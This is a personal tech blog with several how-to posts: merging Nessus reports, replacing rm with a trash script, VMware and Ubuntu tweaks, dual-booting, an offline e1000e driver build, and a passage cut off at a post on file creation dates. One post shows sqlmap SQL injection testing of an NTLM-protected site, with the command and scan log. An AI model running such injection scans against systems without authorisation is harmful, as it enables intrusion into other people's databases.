Wednesday, December 11, 2013

.nessus reports merger AKA How to merge multiple Nessus reports (in .nessus file format)

I came across a situation where I had to merge several Nessus reports into one file, for ease of vulnerability compilation and reporting. Turns out it was just a google ('s/duckduckgo/google/g') search away.[0] :-)

Here is how:
  1. Put the Python script[1] in the same directory as the .nessus files.
  2. Run the script; it creates the folder and file nss_report/report.nessus.
Big thanks to mastahyeti for taking the pain to create this wonderful script.
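As an added example (my own code, not mastahyeti's gist and not part of the original post), here is a small Python merger for .nessus v2 files. It takes the first file as the base, appends the ReportHost entries from the others, and when the same host shows up in two scans it folds the findings together, dropping entries with an identical pluginID/port/protocol so overlapping scans do not double-count. The two sample scans are constructed, minimal documents; a real export carries more (HostProperties tags, plugin output, the Policy block), all of which is passed through untouched. Run in a directory of .nessus files it writes nss_report/report.nessus like the gist does.

```python
import glob
import os
import xml.etree.ElementTree as ET

# Constructed sample exports (not real scan data), trimmed to the elements the merge
# cares about: one <Report> per file holding <ReportHost> entries with <ReportItem>s.
SCAN_A = """<NessusClientData_v2>
  <Policy><policyName>Basic Network Scan</policyName></Policy>
  <Report name="scan-a">
    <ReportHost name="10.0.0.5">
      <HostProperties><tag name="host-ip">10.0.0.5</tag></HostProperties>
      <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
                  pluginID="22964" pluginName="Service Detection"/>
    </ReportHost>
  </Report>
</NessusClientData_v2>"""

SCAN_B = """<NessusClientData_v2>
  <Policy><policyName>Basic Network Scan</policyName></Policy>
  <Report name="scan-b">
    <ReportHost name="10.0.0.5">
      <HostProperties><tag name="host-ip">10.0.0.5</tag></HostProperties>
      <ReportItem port="22" svc_name="ssh" protocol="tcp" severity="0"
                  pluginID="22964" pluginName="Service Detection"/>
      <ReportItem port="0" svc_name="general" protocol="tcp" severity="0"
                  pluginID="10287" pluginName="Traceroute Information"/>
    </ReportHost>
    <ReportHost name="10.0.0.6">
      <HostProperties><tag name="host-ip">10.0.0.6</tag></HostProperties>
      <ReportItem port="445" svc_name="cifs" protocol="tcp" severity="0"
                  pluginID="11011" pluginName="SMB Service Detection"/>
    </ReportHost>
  </Report>
</NessusClientData_v2>"""


def _report(root):
    """Return the <Report> element, refusing anything that is not a .nessus v2 file."""
    if root.tag != "NessusClientData_v2":
        raise ValueError("not a .nessus v2 document: <%s>" % root.tag)
    report = root.find("Report")
    if report is None:
        raise ValueError("no <Report> element in document")
    return report


def _finding_key(item):
    # Two ReportItems describe the same finding if plugin, port and protocol match.
    return (item.get("pluginID"), item.get("port"), item.get("protocol"))


def merge_nessus(xml_docs, report_name="merged"):
    """Merge several .nessus v2 documents (str or bytes) into one ElementTree root.

    The first document supplies the <Policy> and the <Report> container; hosts from
    the other documents are appended, and a host seen twice gets its findings merged
    without duplicating identical plugin/port/protocol entries.
    """
    docs = [ET.fromstring(doc) for doc in xml_docs]
    if not docs:
        raise ValueError("nothing to merge")
    base = docs[0]
    base_report = _report(base)
    base_report.set("name", report_name)
    hosts = {h.get("name"): h for h in base_report.findall("ReportHost")}
    for root in docs[1:]:
        for host in _report(root).findall("ReportHost"):
            name = host.get("name")
            if name not in hosts:
                base_report.append(host)      # whole host, HostProperties included
                hosts[name] = host
                continue
            existing = hosts[name]
            seen = {_finding_key(i) for i in existing.findall("ReportItem")}
            for item in host.findall("ReportItem"):
                key = _finding_key(item)
                if key not in seen:
                    existing.append(item)
                    seen.add(key)
    return base


def host_names(root):
    return [h.get("name") for h in _report(root).findall("ReportHost")]


def finding_count(root, host_name):
    for h in _report(root).findall("ReportHost"):
        if h.get("name") == host_name:
            return len(h.findall("ReportItem"))
    return 0


def merge_files(paths, out_path):
    """Merge .nessus files on disk and write the result (same layout as the gist)."""
    docs = []
    for p in paths:
        with open(p, "rb") as fh:
            docs.append(fh.read())
    root = merge_nessus(docs)
    os.makedirs(os.path.dirname(out_path) or ".", exist_ok=True)
    ET.ElementTree(root).write(out_path, encoding="utf-8", xml_declaration=True)
    return out_path


if __name__ == "__main__":
    files = sorted(glob.glob("*.nessus"))
    if files:
        print("wrote", merge_files(files, os.path.join("nss_report", "report.nessus")))
    else:
        merged = merge_nessus([SCAN_A, SCAN_B])
        for name in host_names(merged):
            print(name, finding_count(merged, name), "finding(s)")
```

Dedup is by (pluginID, port, protocol) only; if two scans ran with different policies the plugin output for the same finding can differ, and the copy from the earlier file wins.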

 ..............Done!!!

Reference(s) :
[0] http://cmikavac.net/2011/07/09/merging-multiple-nessus-scans-python-script/
[1] https://gist.github.com/mastahyeti/2720173

Thursday, November 28, 2013

Force 'rm' to use Trash instead of removing files completely

This one's great.
Just realized that a Linux system, by default, does not move deleted files to a Trash/Bin folder; it's the desktop environment that does that.
So when you run 'rm -rf file', the file is not sent to Trash. If you have deleted some important files by mistake, or want to recover files accidentally removed with 'rm', you can be in trouble.

Here is what you can do to avoid such situations:
Replace 'rm' with a simple bash script that moves the "deleted" files to a .Trash folder instead.

A word of caution before doing this system-wide: everything on the box that calls rm (package maintainer scripts, cron jobs, build systems) silently gets this script instead, and anything that relies on rm's options, its exit status, or on the space actually being freed can misbehave. For an interactive safety net it is less intrusive to leave /usr/bin/rm alone and define the same script as a shell function or alias in ~/.bashrc, or to use a trash-aware tool such as trash-cli. Also note that files moved into ~/.Trash are still on disk, so this is a recovery aid, not a way to securely delete anything.

Note: Shamelessly copied as is from the forum link in the references below.

1. Backup original 'rm' command.

user@ubuntu:~$ sudo mv /usr/bin/rm /usr/bin/rm.bak


2. Create /usr/bin/rm in your favorite editor with the following contents, then make it executable (sudo chmod 755 /usr/bin/rm):

#!/bin/bash
# Replacement for rm: move the named files to ~/.Trash instead of unlinking them.
# rm's options (-r, -f, -i, ...) are ignored; "--" ends option parsing as usual.
mkdir -p ~/.Trash
opts_done=0
for arg in "$@"; do
    if [ "$opts_done" -eq 0 ]; then
        case "$arg" in
            --) opts_done=1; continue ;;
            -*) continue ;;
        esac
    fi
    mv -- "$arg" ~/.Trash/
done


..............Done!!!

Reference(s):
http://www.linuxforums.org/forum/newbie/69673-not-possible-recover-files-deleted-using-rm.html#post364949

Sunday, November 24, 2013

VMware Player missing Virtual Network Manager

This should work with VMware Player 6.0.1.

VMware no longer provides the Virtual Network Editor (vmnetcfg.exe) with VMware Player from version 5.0 onwards, but the copy shipped inside the Workstation installer still works with Player.
For VMware Player 6.0.1 one more file is needed besides vmnetcfg.exe: vmnetcfglib.dll.
Here we go:

  1. Download VMware Workstation (10.0.1 in my case at the time of writing) from VMware's own site. Do not install it.
  2. Extract its files from a command prompt, in the download location:
    C:\Users\user\Downloads\> VMware-workstation-full-10.0.1-1379776.exe /e vmware_extract\
    vmware_extract is the name of the directory the files will be extracted into.
  3. Go to the vmware_extract folder and open core.cab with any archiver (WinZip, WinRAR, 7-Zip, or just double-click it and Windows will open it).
  4. Copy vmnetcfg.exe and _vmnetcfglib.dll to VMware Player's installation folder, which is "C:\Program Files (x86)\VMware\VMware Player" in my case.
  5. Rename _vmnetcfglib.dll to vmnetcfglib.dll (remove the leading underscore '_').
  6. Run vmnetcfg.exe. :-)


..............Done!!!


Reference(s):
https://communities.vmware.com/message/2305040
http://alexduan.com/2012/10/15/vmware-player-5-0-network-editor/

Saturday, September 14, 2013

Unhide system tray icons on Ubuntu 12.04 Unity

I had a couple of applications, like the uGet downloader, TrueCrypt, data card dialers for Reliance Netconnect, Tata Photon+, etc., which keep running in the background when you close them (click on the cross, X).

And at times I needed to bring them to the front for different reasons. By default you do not see any system tray icons in Unity, unlike in GNOME, MATE or the other desktop environments.

So here is how you bring back the system tray icons in Unity.

Run


user@ubuntu:~$ gsettings set com.canonical.Unity.Panel systray-whitelist "['all']"
user@ubuntu:~$ 

..............Done!!!

PS: If the change doesn't show up immediately, run

user@ubuntu:~$ unity --replace

Reference : http://askubuntu.com/questions/67312/how-do-i-enable-the-pidgin-system-tray-icon



Friday, March 1, 2013

Install Windows 7 and Ubuntu/Linux Mint on a Dell Vostro 3460 with a 32GB SSD

This was something I spent a lot of time on, to make the newly shipped laptop dual-boot Win 7 and Linux Mint (I finally switched from Ubuntu to Linux Mint, mainly because of the desktop environment. I'm thinking of conducting a poll, "How many Ubuntu users switched their OS because of the desktop environment?", or was there one already? Anyway, I really got fed up with tweaking and twisting Precise Pangolin with Unity. So it's a good feeling with MATE on Linux Mint 13).


OK, back to the topic.
New Dell laptops ship with a technology called Intel Rapid Storage Technology, for improved protection, performance, etc.: http://www.intel.com/support/chipsets/imsm/sb/CS-020784.htm

They also used Intel Smart Response Technology, Intel Rapid Start Technology, and what not.


My Dell Vostro 3460 has a WDC 1TB hard disk and a 32GB Samsung SSD, with an Intel i7 processor, 8GB DDR3 1600MHz RAM, etc.
The 32GB SSD is meant to be used in conjunction with the high-capacity hard disk; the combination results in a high-performance, cost-effective storage solution. But only in the case of Windows 8. I was quarreling with the Dell support guys about what the point is of shipping it with laptops that cannot utilize it. And they say, "Sir, you can upgrade to Windows 8 so as to utilize it."




Anyway, here is what I did:

You might not find any drive to install to when the SATA operation mode in the BIOS is set to Intel RST.


So you need to go into the BIOS and change SATA operation to AHCI.


Then you will see the drives to reformat and install the OS onto.


The Disk 0 partitions belong to the 32GB SSD, whereas the Disk 1 partitions are on the 1TB WDC hard disk.

There is no possible way to put the 100MB "System Reserved" partition (needed for Win 7) on the 32GB SSD. I tried multiple times to achieve that, with no luck. :-(

Also, 32GB is not enough for C: to install Win 7 onto (with all the driver and other installations, etc.), although it is possible. I was installing all the rest of the software on D:, which I had created on the 1TB hard disk, but again with the exception of the Nvidia graphics driver, as you cannot customize the path while installing it.


Finally, after so many alternatives, I thought of installing Linux first, so that I could use the 32GB SSD for the '/' partition, as 32GB is more than enough for '/' (unlike C: in the case of Windows), and put all the other partitions on the 1TB hard disk:
  • / partition on the 32GB SSD
  • 200MB /boot partition on the 1TB disk
  • 200GB C: partition on the 1TB disk
  • All remaining space as the /home partition on the 1TB disk
I didn't think of swap, as I thought I wouldn't need it because of the 8GB RAM.

Once Linux Mint was installed, install Windows. The Windows installer overwrites the GRUB boot code in the MBR, so the laptop will then boot straight into Windows without offering any other OS; to get GRUB back, follow: https://help.ubuntu.com/community/RecoveringUbuntuAfterInstallingWindows

Once the Grub repair is done, you can see dual boot screen with Linux Mint and Windows 7. :-)





..............Done!!!


[Linux-Mint 13 - Maya] Disable Nvidia discrete graphic card in a Nvidia optimus laptop

I had been really, really screwed up, as I was not able to optimize my laptop's battery life.
I have Windows 7 Pro and Linux Mint 13 Maya in dual boot. Yes, I switched to Linux Mint after a lot of head-banging with Ubuntu 12.04 and its freaky Unity. So this is it, with the Linux Mint 13 MATE variant now.

Alright. Now, I had a hell of a lot of problems lined up with the Dell Vostro 3460 to customize it my own way.

The battery was lasting nearly 5 hours with Windows 7 Pro, but it wasn't the same with Mint. I had to struggle a lot to find ways to optimize my laptop battery. Mint would last for merely 2 hours. That was really annoying. So many optimization options were not really helping me, like installing laptop-mode-tools, disabling unused services at boot time, and what not.
And even after all that, powertop showed power consumption of ~25 Watts.
Moreover, without ANY application open, right after logging into the system. :-(

I was so annoyed that, after thinking of changing distro to Arch Linux, Debian, Fedora or CentOS, I even thought of formatting the laptop and sticking to Windows 7 Pro. :-(
I had paid for Windows 7 anyway, so why not just focus on it.

Anyway let the rest of story rest in peace. :-)

After a lot of head-banging, I figured out that it's the Nvidia driver that is the culprit behind all this. I saw people saying, "if you had to install Linux on a laptop, why go for an Optimus laptop?"

But this blog post saved me hell lot of battery life:
https://wenlong.wordpress.com/2012/05/01/disable-the-nvidia-discrete-graphic-card-in-a-nvidia-optimus-laptop/

Thank you so much man.
Now, powertop shows merely 10 Watts after logging into system. :-)

I thought of creating a bash script for lazy bunnies, but the post has a GitHub download link whose version might differ as well. So that is it!

What do I say to Nvidia when Linus can say that better. :D



..............Done!!!

Tuesday, November 20, 2012

Install Intel Ethernet drivers on Ubuntu 10.04

This is one thing I kept having to do every time I ran sudo apt-get update; apt-get upgrade on my Ubuntu desktop. Thought someone could be stuck with a similar issue.

OK. If you are getting the following error while building the Intel Ethernet (e1000e) driver on Ubuntu:

user@ubuntu:~/e1000e-x.xx.x/src$ sudo make install
Makefile:71: *** Kernel header files not in any of the expected locations.
Makefile:72: *** Install the appropriate kernel development package, e.g.
Makefile:73: *** kernel-devel, for building kernel modules and try again.  Stop.

then follow these steps:

1. Install kernel headers for your kernel version:

user@ubuntu:~/e1000e-x.xx.x/src$ sudo apt-get install linux-headers-$(uname -r)
Reading package lists... Done
Building dependency tree       
Reading state information... Done
The following extra packages will be installed:
  linux-headers-2.6.32-45
The following NEW packages will be installed:
  linux-headers-2.6.32-45 linux-headers-2.6.32-45-generic
0 upgraded, 2 newly installed, 0 to remove and 1 not upgraded.
Need to get 11.0MB of archives.
After this operation, 85.3MB of additional disk space will be used.
Do you want to continue [Y/n]? y
Err http://in.archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-2.6.32-45 2.6.32-45.99
  Could not connect to in.archive.ubuntu.com:80 (91.189.92.202). - connect (110: Connection timed out)
Err http://in.archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-2.6.32-45-generic 2.6.32-45.99
  Could not connect to in.archive.ubuntu.com:80 (91.189.92.202). - connect (110: Connection timed out)
Failed to fetch http://in.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-45_2.6.32-45.99_all.deb  Could not connect to in.archive.ubuntu.com:80 (91.189.92.202). - connect (110: Connection timed out)
Failed to fetch http://in.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-45-generic_2.6.32-45.99_amd64.deb  Could not connect to in.archive.ubuntu.com:80 (91.189.92.202). - connect (110: Connection timed out)
E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?

Of course, without an Internet connection (the Ethernet driver is the thing being fixed), apt cannot fetch the packages from the mirror. But by running this command you learn exactly which packages, and which URLs, are needed.
In my case, those are linux-headers-2.6.32-45 and linux-headers-2.6.32-45-generic.

2. So, let's download those packages from the URLs:
http://in.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-45_2.6.32-45.99_all.deb
http://in.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-45-generic_2.6.32-45.99_amd64.deb

3. Once downloaded (on some box with a working Internet connection), copy them over and install them on the offline machine. Note that 'dpkg -i' does not verify package signatures the way apt does, so fetch the files from an official mirror and compare their SHA256 sums with the values in the release's signed Packages index before installing; on a connected Ubuntu box of the same release, 'apt-get install --download-only' fetches exactly these .deb files into /var/cache/apt/archives through apt's normal verification.

user@ubuntu:~/e1000e-x.xx.x/src$ sudo dpkg -i linux-headers-2.6.32-45*
Selecting previously deselected package linux-headers-2.6.32-45.
(Reading database ... 165649 files and directories currently installed.)
Unpacking linux-headers-2.6.32-45 (from .../linux-headers-2.6.32-45_2.6.32-45.99_all.deb) ...
Selecting previously deselected package linux-headers-2.6.32-45-generic.
Unpacking linux-headers-2.6.32-45-generic (from .../linux-headers-2.6.32-45-generic_2.6.32-45.99_amd64.deb) ...
Setting up linux-headers-2.6.32-45 (2.6.32-45.99) ...
Setting up linux-headers-2.6.32-45-generic (2.6.32-45.99) ...
Examining /etc/kernel/header_postinst.d.
run-parts: executing /etc/kernel/header_postinst.d/dkms 2.6.32-45-generic /boot/vmlinuz-2.6.32-45-generic

run-parts: executing /etc/kernel/header_postinst.d/nvidia-common 2.6.32-45-generic /boot/vmlinuz-2.6.32-45-generic

user@ubuntu:~/e1000e-x.xx.x/src$

4. Now run 'make install' again:

user@ubuntu:~/e1000e-x.xx.x/src$ sudo make install
make -C /lib/modules/2.6.32-45-generic/build SUBDIRS=/home/user/e1000e-x.xx.x/src modules
make[1]: Entering directory `/usr/src/linux-headers-2.6.32-45-generic'
  CC [M]  /home/user/e1000e-x.xx.x/src/netdev.o
  CC [M]  /home/user/e1000e-x.xx.x/src/ethtool.o
  CC [M]  /home/user/e1000e-x.xx.x/src/param.o
  CC [M]  /home/user/e1000e-x.xx.x/src/82571.o
  CC [M]  /home/user/e1000e-x.xx.x/src/ich8lan.o
  CC [M]  /home/user/e1000e-x.xx.x/src/80003es2lan.o
  CC [M]  /home/user/e1000e-x.xx.x/src/mac.o
  CC [M]  /home/user/e1000e-x.xx.x/src/nvm.o
  CC [M]  /home/user/e1000e-x.xx.x/src/phy.o
  CC [M]  /home/user/e1000e-x.xx.x/src/manage.o
  CC [M]  /home/user/e1000e-x.xx.x/src/kcompat.o
  LD [M]  /home/user/e1000e-x.xx.x/src/e1000e.o
  Building modules, stage 2.
  MODPOST 1 modules
  CC      /home/user/e1000e-x.xx.x/src/e1000e.mod.o
  LD [M]  /home/user/e1000e-x.xx.x/src/e1000e.ko
make[1]: Leaving directory `/usr/src/linux-headers-2.6.32-45-generic'
# remove all old versions of the driver
find /lib/modules/2.6.32-45-generic -name e1000e.ko -exec rm -f {} \; || true
find /lib/modules/2.6.32-45-generic -name e1000e.ko.gz -exec rm -f {} \; || true
install -D -m 644 e1000e.ko /lib/modules/2.6.32-45-generic/kernel/drivers/net/ethernet/intel/e1000e/e1000e.ko
/sbin/depmod -a || true
install -D -m 644 e1000e.7.gz /usr/share/man/man7/e1000e.7.gz
man -c -P'cat > /dev/null' e1000e || true
e1000e.

This looks good.

5. Even after all this, sudo modprobe e1000e didn't work and I didn't get the Ethernet connection back. :-(
The reason is that the old in-kernel e1000e module was still loaded, so modprobe had nothing to do. Unload it first, then load the freshly installed one. 'modinfo -n e1000e' shows which .ko file modprobe will pick up and 'modinfo -F version e1000e' shows its version, which is a quick way to confirm that the new build is the one in use. Since this is an out-of-tree module, the build has to be repeated after every kernel update (the run-parts lines above are DKMS hooks; registering the driver source with DKMS automates that rebuild).

user@ubuntu:~/e1000e-x.xx.x/src$ sudo rmmod e1000e
user@ubuntu:~/e1000e-x.xx.x/src$ sudo modprobe e1000e
user@ubuntu:~/e1000e-x.xx.x/src$
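An added example, not part of the original post, for the sideloading in steps 2 and 3: a Python helper that pulls the missing .deb URLs out of the apt output above, looks up the expected SHA256 of each file in a Packages index, and checks a download against it before the file is handed to 'dpkg -i'. The apt text and the two index stanzas are constructed samples; the first stanza's hash is deliberately the SHA256 of the bytes "hello\n" so the check can be exercised offline, and the second is a placeholder. A real Packages index gets its authority from the signed Release file, so fetch it through apt (or verify its signature) rather than trusting a bare HTTP copy.

```python
import hashlib
import hmac
import re

# Constructed sample: the 'Failed to fetch' lines from the apt-get run in the post.
APT_OUTPUT = """Err http://in.archive.ubuntu.com/ubuntu/ lucid-updates/main linux-headers-2.6.32-45 2.6.32-45.99
  Could not connect to in.archive.ubuntu.com:80 (91.189.92.202). - connect (110: Connection timed out)
Failed to fetch http://in.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-45_2.6.32-45.99_all.deb  Could not connect to in.archive.ubuntu.com:80 (91.189.92.202). - connect (110: Connection timed out)
Failed to fetch http://in.archive.ubuntu.com/ubuntu/pool/main/l/linux/linux-headers-2.6.32-45-generic_2.6.32-45.99_amd64.deb  Could not connect to in.archive.ubuntu.com:80 (91.189.92.202). - connect (110: Connection timed out)
E: Unable to fetch some archives, maybe run apt-get update or try with --fix-missing?
"""

# Constructed Packages-index stanzas. The first SHA256 is sha256("hello\n") so the
# verification below can run offline; the second is a placeholder, not a real value.
PACKAGES_INDEX = """Package: linux-headers-2.6.32-45
Version: 2.6.32-45.99
Architecture: all
Filename: pool/main/l/linux/linux-headers-2.6.32-45_2.6.32-45.99_all.deb
SHA256: 5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03

Package: linux-headers-2.6.32-45-generic
Version: 2.6.32-45.99
Architecture: amd64
Filename: pool/main/l/linux/linux-headers-2.6.32-45-generic_2.6.32-45.99_amd64.deb
SHA256: 0000000000000000000000000000000000000000000000000000000000000000
"""

FETCH_RE = re.compile(r"^Failed to fetch (\S+\.deb)", re.M)


def missing_deb_urls(apt_output):
    """URLs apt reported it could not fetch, in order, without duplicates."""
    urls = []
    for url in FETCH_RE.findall(apt_output):
        if url not in urls:
            urls.append(url)
    return urls


def parse_packages_index(text):
    """Map 'Filename' -> lowercase SHA256 from Packages stanzas (blank-line separated)."""
    hashes = {}
    for stanza in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in stanza.splitlines():
            if ":" in line and not line[:1].isspace():  # continuation lines are indented
                key, value = line.split(":", 1)
                fields[key.strip()] = value.strip()
        if "Filename" in fields and "SHA256" in fields:
            hashes[fields["Filename"]] = fields["SHA256"].lower()
    return hashes


def expected_sha256(url, index_hashes):
    """Look a pool URL up in the index by its 'pool/...' path; None if unknown."""
    marker = "/pool/"
    if marker not in url:
        return None
    return index_hashes.get(url[url.index(marker) + 1:])


def sha256_of_bytes(data):
    return hashlib.sha256(data).hexdigest()


def sha256_of_file(path):
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(1 << 20), b""):
            digest.update(chunk)
    return digest.hexdigest()


def digest_matches(actual_hex, expected_hex):
    """Constant-time comparison; False when the index had no entry for the file."""
    if expected_hex is None:
        return False
    return hmac.compare_digest(actual_hex.lower(), expected_hex.lower())


def verify_deb_file(path, url, index_hashes):
    """True only if the downloaded .deb matches the hash the index lists for that URL."""
    return digest_matches(sha256_of_file(path), expected_sha256(url, index_hashes))


if __name__ == "__main__":
    index = parse_packages_index(PACKAGES_INDEX)
    for url in missing_deb_urls(APT_OUTPUT):
        print("wget", url, "  # expected sha256:", expected_sha256(url, index))
```

On the offline box, call verify_deb_file() on each copied .deb with the URL apt printed and the parsed index, and only run 'dpkg -i' on the files that return True.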


..............Done!!!

Tuesday, August 7, 2012

sqlmap - NTLM authentication

It's been a while since I've posted anything new.
Stumbled upon an issue while I was trying NTLM authentication with 'sqlmap'.
Well, if you are using sqlmap from BackTrack, this post is not for you. :-)

But if you are trying your hand at sqlmap on your favorite Linux distro (Ubuntu, in my case), then this post will help you use sqlmap against NTLM-authenticated websites.

So here we go:

1. Tried running sqlmap with the --auth-type and --auth-cred switches:

user@ubuntu:~$ ./sqlmap.py --auth-type=NTLM --auth-cred="DOMAIN\username:password" -u "http://www.domain.com/home.php?vulnid=1" -p "vulnid"

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 12:22:48

[12:22:48] [CRITICAL] sqlmap requires Python NTLM third-party library in order to authenticate via NTLM, http://code.google.com/p/python-ntlm/

[*] shutting down at: 12:22:48


2. Failed. OK. Downloaded the python-ntlm library and tried to install it:

user@ubuntu:~$ sudo python setup.py install
Traceback (most recent call last):
  File "setup.py", line 1, in 
    from setuptools import setup, find_packages
ImportError: No module named setuptools


3. Failed again. Will try installing setuptools. Download setuptools from here:


user@ubuntu:~$ sudo sh setuptools-0.6c11-py2.7.egg 
[sudo] password for user: 
Processing setuptools-0.6c11-py2.7.egg
Copying setuptools-0.6c11-py2.7.egg to /usr/local/lib/python2.7/dist-packages
Adding setuptools 0.6c11 to easy-install.pth file
Installing easy_install script to /usr/local/bin
Installing easy_install-2.7 script to /usr/local/bin

Installed /usr/local/lib/python2.7/dist-packages/setuptools-0.6c11-py2.7.egg
Processing dependencies for setuptools==0.6c11
Finished processing dependencies for setuptools==0.6c11


4. After successfully installing setuptools, try installing the python-ntlm library again. (Note that 'sudo python setup.py install' runs the package's own setup code as root, so only do this with a copy fetched from the project's own site.)

user@ubuntu:~$ sudo python setup.py install
running install
Checking .pth file support in /usr/local/lib/python2.7/dist-packages/
/usr/bin/python -E -c pass
TEST PASSED: /usr/local/lib/python2.7/dist-packages/ appears to support .pth files
running bdist_egg
running egg_info
creating python_ntlm.egg-info
writing python_ntlm.egg-info/PKG-INFO
writing top-level names to python_ntlm.egg-info/top_level.txt
writing dependency_links to python_ntlm.egg-info/dependency_links.txt
writing entry points to python_ntlm.egg-info/entry_points.txt
writing manifest file 'python_ntlm.egg-info/SOURCES.txt'
writing manifest file 'python_ntlm.egg-info/SOURCES.txt'
installing library code to build/bdist.linux-x86_64/egg
running install_lib
running build_py
creating build
creating build/lib.linux-x86_64-2.7
creating build/lib.linux-x86_64-2.7/ntlm
copying ntlm/des_data.py -> build/lib.linux-x86_64-2.7/ntlm
copying ntlm/des_c.py -> build/lib.linux-x86_64-2.7/ntlm
copying ntlm/U32.py -> build/lib.linux-x86_64-2.7/ntlm
copying ntlm/ntlm.py -> build/lib.linux-x86_64-2.7/ntlm
copying ntlm/__init__.py -> build/lib.linux-x86_64-2.7/ntlm
copying ntlm/des.py -> build/lib.linux-x86_64-2.7/ntlm
copying ntlm/HTTPNtlmAuthHandler.py -> build/lib.linux-x86_64-2.7/ntlm
creating build/bdist.linux-x86_64
creating build/bdist.linux-x86_64/egg
creating build/bdist.linux-x86_64/egg/ntlm
copying build/lib.linux-x86_64-2.7/ntlm/des_data.py -> build/bdist.linux-x86_64/egg/ntlm
copying build/lib.linux-x86_64-2.7/ntlm/des_c.py -> build/bdist.linux-x86_64/egg/ntlm
copying build/lib.linux-x86_64-2.7/ntlm/U32.py -> build/bdist.linux-x86_64/egg/ntlm
copying build/lib.linux-x86_64-2.7/ntlm/ntlm.py -> build/bdist.linux-x86_64/egg/ntlm
copying build/lib.linux-x86_64-2.7/ntlm/__init__.py -> build/bdist.linux-x86_64/egg/ntlm
copying build/lib.linux-x86_64-2.7/ntlm/des.py -> build/bdist.linux-x86_64/egg/ntlm
copying build/lib.linux-x86_64-2.7/ntlm/HTTPNtlmAuthHandler.py -> build/bdist.linux-x86_64/egg/ntlm
byte-compiling build/bdist.linux-x86_64/egg/ntlm/des_data.py to des_data.pyc
byte-compiling build/bdist.linux-x86_64/egg/ntlm/des_c.py to des_c.pyc
byte-compiling build/bdist.linux-x86_64/egg/ntlm/U32.py to U32.pyc
byte-compiling build/bdist.linux-x86_64/egg/ntlm/ntlm.py to ntlm.pyc
byte-compiling build/bdist.linux-x86_64/egg/ntlm/__init__.py to __init__.pyc
byte-compiling build/bdist.linux-x86_64/egg/ntlm/des.py to des.pyc
byte-compiling build/bdist.linux-x86_64/egg/ntlm/HTTPNtlmAuthHandler.py to HTTPNtlmAuthHandler.pyc
creating build/bdist.linux-x86_64/egg/EGG-INFO
copying python_ntlm.egg-info/PKG-INFO -> build/bdist.linux-x86_64/egg/EGG-INFO
copying python_ntlm.egg-info/SOURCES.txt -> build/bdist.linux-x86_64/egg/EGG-INFO
copying python_ntlm.egg-info/dependency_links.txt -> build/bdist.linux-x86_64/egg/EGG-INFO
copying python_ntlm.egg-info/entry_points.txt -> build/bdist.linux-x86_64/egg/EGG-INFO
copying python_ntlm.egg-info/not-zip-safe -> build/bdist.linux-x86_64/egg/EGG-INFO
copying python_ntlm.egg-info/top_level.txt -> build/bdist.linux-x86_64/egg/EGG-INFO
creating dist
creating 'dist/python_ntlm-1.0.1-py2.7.egg' and adding 'build/bdist.linux-x86_64/egg' to it
removing 'build/bdist.linux-x86_64/egg' (and everything under it)
Processing python_ntlm-1.0.1-py2.7.egg
creating /usr/local/lib/python2.7/dist-packages/python_ntlm-1.0.1-py2.7.egg
Extracting python_ntlm-1.0.1-py2.7.egg to /usr/local/lib/python2.7/dist-packages
Adding python-ntlm 1.0.1 to easy-install.pth file
Installing ntlm_example_extended script to /usr/local/bin
Installing ntlm_example_simple script to /usr/local/bin

Installed /usr/local/lib/python2.7/dist-packages/python_ntlm-1.0.1-py2.7.egg
Processing dependencies for python-ntlm==1.0.1
Finished processing dependencies for python-ntlm==1.0.1


5. So, the python-ntlm library has been installed successfully. Now we try again, running sqlmap with the --auth-type and --auth-cred switches. One caveat: credentials given on the command line land in your shell history and are visible to other local users via ps, so on a shared box keep them in a sqlmap configuration file (loaded with -c) instead:


user@ubuntu:~$ ./sqlmap.py --auth-type=NTLM --auth-cred="DOMAIN\username:password" -u "http://www.domain.com/home.php?vulnid=1" -p "vulnid"

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

[*] starting at: 12:35:38

[12:35:39] [INFO] using '/home/user/sqlmap/output/domain.com/session' as session file
[12:35:47] [INFO] testing connection to the target url
[12:36:11] [INFO] testing if the url is stable, wait a few seconds
[12:36:12] [INFO] url is stable
[12:36:12] [INFO] testing sql injection on GET parameter 'vulnid'
[12:36:12] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[12:36:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause'
[12:36:14] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[12:36:14] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[12:36:15] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[12:36:15] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[12:36:15] [INFO] testing 'PostgreSQL > 8.1 stacked queries'
[12:36:16] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries'
[12:36:16] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[12:36:17] [INFO] testing 'PostgreSQL > 8.1 AND time-based blind'
[12:36:17] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[12:36:17] [INFO] testing 'Oracle AND time-based blind'
[12:36:18] [INFO] testing 'MySQL UNION query (NULL) - 1 to 10 columns'
[12:36:22] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
[12:36:22] [WARNING] using unescaped version of the test because of zero knowledge of the back-end DBMS
.
.
.
.
<..snip..>



..............Done!!!

Tuesday, September 27, 2011

How to find file creation date in Linux

I had been struggling a lot, A LOT (I mean it), to find *any* possible way to get the file creation date on Linux systems. But at one point I had given up.
Then, suddenly, I came across a post on garage4hackers, and was so happy to see it.
So here we go...

